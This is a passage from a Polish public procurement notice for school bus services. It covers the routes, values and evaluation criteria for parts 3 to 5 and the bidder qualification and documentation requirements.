obejmującą<br/>wszelkie koszty związane z wykonaniem zamówienia, opłaty, podatki (w tym<br/>podatek od towarów i usług – VAT) i wszystkie inne koszty o jakimkolwiek<br/>charakterze, które mogą powstać w związku z realizacją przedmiotu zamówienia.<br/>7. Cena oferty w przypadku Wykonawców nie mających siedziby lub miejsca zamieszkania<br/>na terytorium Rzeczypospolitej Polskiej jest ceną netto, wyrażoną w PLN (nie<br/>uwzględniającą podatku od towarów i usług obowiązującego w Polsce), obejmującą<br/>wszelkie koszty związane z wykonaniem zamówienia, wszystkie opłaty, cła,<br/>podatki (bez podatku od towarów i usług VAT) i wszystkie inne koszty<br/>o jakimkolwiek charakterze, które mogą powstać w związku z realizacją<br/>przedmiotu zamówienia.<br/>8. Cena oferty określona przez Wykonawcę zostanie ustalona na okres ważności umowy<br/>i nie będzie podlegała zmianom, z wyłączeniem sytuacji opisanych w umowie<br/>o zamówienie publiczne.<br/>9. Cena (w danej części zamówienia) może być tylko jedna, nie dopuszcza się<br/>wariantowości cen.<br/>10. Cena oferty nie będzie podlegać okresowej waloryzacji przez okres obowiązywania<br/>umowy.<br/>11. Zgodnie z powyższymi uregulowaniami, ostateczna cena zadeklarowana w ofercie musi<br/>zawierać prawidłową stawkę podatku VAT oraz musi być wyrażona w złotych polskich<br/>z dokładnością do setnych części złotego, tj. do drugiego miejsca po przecinku.<br/>12. Wszelkie przyszłe rozliczenia między Zamawiającym a Wykonawcą dokonywane będą<br/>w złotych polskich.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dowóz na trasie: Piłka – Piłka Wybudowanie – Piłka Las – Przystanek Dąbrówka - Piłka Szkoła Podstawowa – Piłka Przedszkole.<br/>Odwóz na trasie: Piłka Szkoła Podstawowa – Piłka Przedszkole – Przystanek Dąbrówka - Piłka Las – Piłka Wybudowanie<br/>Ok. 45 km. dziennie </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 100000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wykonawca jest zobowiązany do wypełnienia „Formularza oferty” w zakresie części<br/>zamówienia, na które składa ofertę.<br/>2. Cena podana w Formularzu ofertowym (dla każdej z części – Załącznik nr 1 do SWZ)<br/>musi uwzględniać wszystkie koszty realizacji przyszłej umowy. Cena za 1 km musi<br/>obejmować cenę usługi dowozu uczniów oraz cenę usługi opiekunów.<br/>3. Zamawiający wymaga podania ceny za 1 km (dla każdej części).<br/>4. Rozliczenia pomiędzy Zamawiającym a Wykonawcą zostaną dokonane za faktycznie<br/>zrealizowane usługi w sposób określony umową zgodnie z ceną za 1 km dowozu<br/>uczniów oraz usługi opiekunów.<br/>5. Cena oferty dla każdej z części musi być podana w PLN (brutto) cyfrowo. Cenę oferty<br/>należy obliczyć i zapisać zgodnie z formularzem ofertowym.<br/>6. Cena oferty w przypadku Wykonawców mających siedzibę lub miejsce zamieszkania na<br/>terytorium Rzeczypospolitej Polskiej jest ceną brutto, wyrażoną w PLN, obejmującą<br/>wszelkie koszty związane z wykonaniem zamówienia, opłaty, podatki (w tym<br/>podatek od towarów i usług – VAT) i wszystkie inne koszty o jakimkolwiek<br/>charakterze, które mogą powstać w związku z realizacją przedmiotu zamówienia.<br/>7. Cena oferty w przypadku Wykonawców nie mających siedziby lub miejsca zamieszkania<br/>na terytorium Rzeczypospolitej Polskiej jest ceną netto, wyrażoną w PLN (nie<br/>uwzględniającą podatku od towarów i usług obowiązującego w Polsce), obejmującą<br/>wszelkie koszty związane z wykonaniem zamówienia, wszystkie opłaty, cła,<br/>podatki (bez podatku od towarów i usług VAT) i wszystkie inne koszty<br/>o jakimkolwiek charakterze, które mogą powstać w związku z realizacją<br/>przedmiotu zamówienia.<br/>8. Cena oferty określona przez Wykonawcę zostanie ustalona na okres ważności umowy<br/>i nie będzie podlegała zmianom, z wyłączeniem sytuacji opisanych w umowie<br/>o zamówienie publiczne.<br/>9. Cena (w danej części zamówienia) może być tylko jedna, nie dopuszcza się<br/>wariantowości cen.<br/>10. Cena oferty nie będzie podlegać okresowej waloryzacji przez okres obowiązywania<br/>umowy.<br/>11. Zgodnie z powyższymi uregulowaniami, ostateczna cena zadeklarowana w ofercie musi<br/>zawierać prawidłową stawkę podatku VAT oraz musi być wyrażona w złotych polskich<br/>z dokładnością do setnych części złotego, tj. do drugiego miejsca po przecinku.<br/>12. Wszelkie przyszłe rozliczenia między Zamawiającym a Wykonawcą dokonywane będą<br/>w złotych polskich.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dowóz na trasie: Piłka – Pęckowo- Drawski Młyn – Drawsko – Kawczyn - Drezdenko<br/>Odwóz na trasie: Drezdenko – Kawczyn – Drawsko – Drawski Młyn – Pęckowo – Piłka.<br/>Ok. 124 km dziennie </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 200000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wykonawca jest zobowiązany do wypełnienia „Formularza oferty” w zakresie części<br/>zamówienia, na które składa ofertę.<br/>2. Cena podana w Formularzu ofertowym (dla każdej z części – Załącznik nr 1 do SWZ)<br/>musi uwzględniać wszystkie koszty realizacji przyszłej umowy. Cena za 1 km musi<br/>obejmować cenę usługi dowozu uczniów oraz cenę usługi opiekunów.<br/>3. Zamawiający wymaga podania ceny za 1 km (dla każdej części).<br/>4. Rozliczenia pomiędzy Zamawiającym a Wykonawcą zostaną dokonane za faktycznie<br/>zrealizowane usługi w sposób określony umową zgodnie z ceną za 1 km dowozu<br/>uczniów oraz usługi opiekunów.<br/>5. Cena oferty dla każdej z części musi być podana w PLN (brutto) cyfrowo. Cenę oferty<br/>należy obliczyć i zapisać zgodnie z formularzem ofertowym.<br/>6. Cena oferty w przypadku Wykonawców mających siedzibę lub miejsce zamieszkania na<br/>terytorium Rzeczypospolitej Polskiej jest ceną brutto, wyrażoną w PLN, obejmującą<br/>wszelkie koszty związane z wykonaniem zamówienia, opłaty, podatki (w tym<br/>podatek od towarów i usług – VAT) i wszystkie inne koszty o jakimkolwiek<br/>charakterze, które mogą powstać w związku z realizacją przedmiotu zamówienia.<br/>7. Cena oferty w przypadku Wykonawców nie mających siedziby lub miejsca zamieszkania<br/>na terytorium Rzeczypospolitej Polskiej jest ceną netto, wyrażoną w PLN (nie<br/>uwzględniającą podatku od towarów i usług obowiązującego w Polsce), obejmującą<br/>wszelkie koszty związane z wykonaniem zamówienia, wszystkie opłaty, cła,<br/>podatki (bez podatku od towarów i usług VAT) i wszystkie inne koszty<br/>o jakimkolwiek charakterze, które mogą powstać w związku z realizacją<br/>przedmiotu zamówienia.<br/>8. Cena oferty określona przez Wykonawcę zostanie ustalona na okres ważności umowy<br/>i nie będzie podlegała zmianom, z wyłączeniem sytuacji opisanych w umowie<br/>o zamówienie publiczne.<br/>9. Cena (w danej części zamówienia) może być tylko jedna, nie dopuszcza się<br/>wariantowości cen.<br/>10. Cena oferty nie będzie podlegać okresowej waloryzacji przez okres obowiązywania<br/>umowy.<br/>11. Zgodnie z powyższymi uregulowaniami, ostateczna cena zadeklarowana w ofercie musi<br/>zawierać prawidłową stawkę podatku VAT oraz musi być wyrażona w złotych polskich<br/>z dokładnością do setnych części złotego, tj. do drugiego miejsca po przecinku.<br/>12. Wszelkie przyszłe rozliczenia między Zamawiającym a Wykonawcą dokonywane będą<br/>w złotych polskich.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dowóz na trasie: Pęckowo Wybudowanie – Trzcianka Szkoła Podstawowa nr 3<br/>Odwóz na trasie: Trzcianka Szkoła Podstawowa nr 3 – Pęckowo Wybudowanie<br/>Ok. 160 km dziennie </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 200000,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Wykonawca jest zobowiązany do wypełnienia „Formularza oferty” w zakresie części<br/>zamówienia, na które składa ofertę.<br/>2. Cena podana w Formularzu ofertowym (dla każdej z części – Załącznik nr 1 do SWZ)<br/>musi uwzględniać wszystkie koszty realizacji przyszłej umowy. Cena za 1 km musi<br/>obejmować cenę usługi dowozu uczniów oraz cenę usługi opiekunów.<br/>3. Zamawiający wymaga podania ceny za 1 km (dla każdej części).<br/>4. Rozliczenia pomiędzy Zamawiającym a Wykonawcą zostaną dokonane za faktycznie<br/>zrealizowane usługi w sposób określony umową zgodnie z ceną za 1 km dowozu<br/>uczniów oraz usługi opiekunów.<br/>5. Cena oferty dla każdej z części musi być podana w PLN (brutto) cyfrowo. Cenę oferty<br/>należy obliczyć i zapisać zgodnie z formularzem ofertowym.<br/>6. Cena oferty w przypadku Wykonawców mających siedzibę lub miejsce zamieszkania na<br/>terytorium Rzeczypospolitej Polskiej jest ceną brutto, wyrażoną w PLN, obejmującą<br/>wszelkie koszty związane z wykonaniem zamówienia, opłaty, podatki (w tym<br/>podatek od towarów i usług – VAT) i wszystkie inne koszty o jakimkolwiek<br/>charakterze, które mogą powstać w związku z realizacją przedmiotu zamówienia.<br/>7. Cena oferty w przypadku Wykonawców nie mających siedziby lub miejsca zamieszkania<br/>na terytorium Rzeczypospolitej Polskiej jest ceną netto, wyrażoną w PLN (nie<br/>uwzględniającą podatku od towarów i usług obowiązującego w Polsce), obejmującą<br/>wszelkie koszty związane z wykonaniem zamówienia, wszystkie opłaty, cła,<br/>podatki (bez podatku od towarów i usług VAT) i wszystkie inne koszty<br/>o jakimkolwiek charakterze, które mogą powstać w związku z realizacją<br/>przedmiotu zamówienia.<br/>8. Cena oferty określona przez Wykonawcę zostanie ustalona na okres ważności umowy<br/>i nie będzie podlegała zmianom, z wyłączeniem sytuacji opisanych w umowie<br/>o zamówienie publiczne.<br/>9. Cena (w danej części zamówienia) może być tylko jedna, nie dopuszcza się<br/>wariantowości cen.<br/>10. Cena oferty nie będzie podlegać okresowej waloryzacji przez okres obowiązywania<br/>umowy.<br/>11. Zgodnie z powyższymi uregulowaniami, ostateczna cena zadeklarowana w ofercie musi<br/>zawierać prawidłową stawkę podatku VAT oraz musi być wyrażona w złotych polskich<br/>z dokładnością do setnych części złotego, tj. do drugiego miejsca po przecinku.<br/>12. Wszelkie przyszłe rozliczenia między Zamawiającym a Wykonawcą dokonywane będą<br/>w złotych polskich.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki<br/>udziału w postępowaniu, dotyczące:<br/>1.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o ile wynika to z odrębnych przepisów:<br/>Dla części nr 1, 2, 3, 4, 5:<br/>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada<br/>zezwolenie na wykonywanie zawodu przewoźnika drogowego w zakresie<br/>krajowego przewozu osób wydanego na podstawie ustawy z dnia 6 września<br/>2001 r. o transporcie drogowym.<br/>1.3. sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.<br/>1.4. zdolności technicznej lub zawodowej:<br/>a)	Wymagane jest wykazanie przez wykonawcę realizacji co najmniej 1 usługi w zakresie dowozu dzieci do szkół trwającej min. 9 miesięcy w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane. (Warunek będzie spełniony przy wykazaniu w/w doświadczenia dla dowolnej liczby części).<br/>W celu wykazania, że wykonawca spełnia niniejszy warunek udziału w postępowaniu, należy złożyć na wezwanie zamawiającego: <br/>- Wykaz usług, stanowiący załącznik do SIWZ, <br/>- dowody określające czy w/w usługa/i została/y wykonana/e lub jest/są wykonywana/e należycie - zgodnie z niniejszym warunkiem, przy czym dowodami, o których mowa, <br/>są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; <br/>b) Wymagane jest wykazanie, że wykonawca dysponuje min. 1 autobusem/busem dla: <br/>Cz. I - min. 50 miejsc siedzących, <br/>Cz. II - min. 12 miejsc siedzących <br/>Cz. III - min. 10 miejsc siedzących, <br/>Cz. IV - min. 8 miejsc siedzących<br/>Cz .V - min 4 miejsca siedzące<br/><br/>W celu wykazania spełniania niniejszego warunku, na wezwanie zamawiającego należy złożyć wykaz : nr rejestracyjny pojazdu, liczba miejsc siedzących, informacja o terminie ważności przeglądu technicznego, informacja o terminie ważności ubezpieczenia pojazdu, data produkcji pojazdu).<br/>c)	Wymagane jest wykazanie przez wykonawcę, że dysponuje osobami, skierowanymi przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnymi za świadczenie usług, <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>- Wymagane jest wykazanie, że wykonawca dysponuje osobami z uprawnieniami <br/>do kierowania autobusami i busami dla każdej oferowanej części zamówienia. <br/>- Wymagane jest wykazanie, że wykonawca dysponuje opiekunem dla części I, II, III, IV i V zamówienia posiadającym szkolenie BHP. <br/>W celu wykazania spełniania niniejszego warunku należy złożyć na wezwanie zamawiającego wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, z którego będzie wynikać, że kierowcy mają odpowiednie uprawnienia do kierowania autobusem/busem, a opiekunowie posiadają szkolenie BHP. <br/><br/>4. Do oferty Wykonawca dołącza aktualne na dzień składania ofert oświadczenie, o którym<br/>mowa w art. 125 ust. 1 ustawy Pzp. Informacje zawarte w oświadczeniu stanowią<br/>wstępne potwierdzenie, że Wykonawca:<br/>4.1. nie podlega wykluczeniu z postępowania oraz<br/>4.2. spełnia warunki udziału w postępowaniu.<br/>Zamawiający zaleca wykorzystanie Załącznika nr 3a do SWZ.<br/>5. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>Zamawiający, na podstawie art. 117 ust. 1 ustawy Pzp., określa, iż dokonując oceny<br/>spełniania warunku udziału w postępowaniu dotyczącego zdolności zawodowej uzna, że<br/>warunek został spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia wykaże samodzielne spełnianie tego<br/>warunku. Zamawiający tym samym nie dopuszcza łączenia (sumowania) doświadczenia<br/>zdobytego osobno przez każdego z wykonawców wspólnie ubiegających się<br/>o udzielenie zamówienia.<br/>6. W przypadku, gdy Wykonawca w celu potwierdzenia spełniania warunku udziału<br/>w postępowaniu dotyczącego zdolności zawodowej polega, na zasadach określonych<br/>w art. 118 ustawy Pzp., na zdolnościach zawodowych innych podmiotów, Zamawiający<br/>określa, iż dokonując oceny spełniania warunku udziału w postępowaniu dotyczącego<br/>zdolności zawodowej uzna, że warunek został spełniony, jeżeli co najmniej jeden z tych<br/>podmiotów wykaże samodzielne spełnianie tego warunku. Zamawiający tym samym nie<br/>dopuszcza łączenia (sumowania) doświadczenia zdobytego osobno przez każdy<br/>z podmiotów, na których zdolnościach zawodowych polega Wykonawca.<br/>7. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej, o którym mowa w art. 112 ust. 2 pkt 2 Ustawy Pzp., jest spełniony, jeżeli<br/>co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te<br/>uprawnienia są wymagane.<br/>8. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą<br/>polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub<br/>usługi, do realizacji których te zdolności są wymagane.<br/>9. W przypadku, o którym mowa w ust. 7 i 8, Wykonawcy wspólnie ubiegający się<br/>o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy.<br/>Zamawiający zaleca wykorzystanie Załącznika nr 4 do SWZ.<br/>10. Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu,<br/>w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego<br/>części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej<br/>lub ekonomicznej podmiotów udostępniających zasoby, niezależnie od charakteru<br/>prawnego łączących go z nimi stosunków prawnych.<br/>11. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia wykonawcy mogą polegać na zdolnościach podmiotów udostępniających<br/>zasoby, jeśli podmioty te wykonają roboty budowlane lub usługi, do realizacji których te<br/>zdolności są wymagane.<br/>12. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca<br/>realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>13. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa<br/>w art. 125 ust. 1 ustawy Pzp., także oświadczenie podmiotu udostępniającego zasoby,<br/>potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie<br/>warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na<br/>jego zasoby.<br/>Zamawiający zaleca wykorzystanie Załącznika nr 3b do SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">. Informacja o podmiotowych środkach dowodowych, w celu potwierdzenia<br/>braku podstaw wykluczenia wykonawcy z udziału w postępowaniu<br/>1. W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu<br/>o udzielenie zamówienia publicznego, Zamawiający żąda następujących podmiotowych<br/>środków dowodowych:<br/>1.1. odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy<br/>Pzp., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli<br/>odrębne przepisy wymagają wpisu do rejestru lub ewidencji.<br/>2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami<br/>Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru<br/>Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, o których<br/>mowa w ust. 1 pkt 1.1. – składa dokument lub dokumenty wystawione w kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie<br/>otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator<br/>lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest<br/>zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej<br/>procedury przewidzianej w przepisach miejsca wszczęcia tej procedury.<br/>3. Dokumenty, o których mowa w ust. 2, powinny być wystawione nie wcześniej niż<br/>3 miesiące przed ich złożeniem.<br/>4. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce<br/>zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów,<br/>o których mowa w ust. 2, lub gdy dokumenty te nie odnoszą się do wszystkich<br/>przypadków, o których mowa w art. 108 ust. 1 pkt 1, 2 i 4 ustawy, zastępuje się je<br/>odpowiednio w całości lub w części dokumentem zawierającym odpowiednio<br/>oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego<br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod<br/>przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania lub miejsce zamieszkania ma osoba, której dokument miał dotyczyć, nie<br/>ma przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub<br/>administracyjnym, notariuszem, organem samorządu zawodowego lub gospodarczego,<br/>właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy lub miejsce<br/>zamieszkania osoby, której dokument miał dotyczyć. Przepis ust. 3 stosuje się.<br/>5. Zgodnie z art. 274 ust. 1 lub 2 Ustawy Pzp, podmiotowe środki dowodowe składane są<br/>na wezwanie Zamawiającego, a nie wraz z ofertą.<br/>6. Podmiotowe środki dowodowe – na wezwanie Zamawiającego – składa się, pod<br/>rygorem nieważności, w formie elektronicznej (opatrzonej kwalifikowanym podpisem<br/>elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym.<br/>UWAGA!!!<br/>Powyższych dokumentów NIE NALEŻY składać wraz z ofertą. Dokumenty składa się<br/>na wezwanie Zamawiającego, a nie samodzielnie wraz z ofertą.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu<br/>dotyczących wymaganych uprawnień do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej, Zamawiający żąda zezwolenia, licencji, koncesji lub wpisu<br/>do rejestru działalności regulowanej, tj.:<br/>1.1. koncesję, zezwolenie, licencję lub dokument potwierdzający, że Wykonawca jest<br/>wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych<br/>w państwie członkowskim Unii Europejskiej, w którym Wykonawca ma siedzibę lub<br/>miejsce zamieszkania.<br/>2. W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu<br/>dotyczących zdolności technicznej lub zawodowej, Zamawiający, żąda następujących<br/>podmiotowych środków dowodowych:<br/>2.1. wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub<br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich<br/>wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały<br/>wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te<br/>usługi zostały wykonane 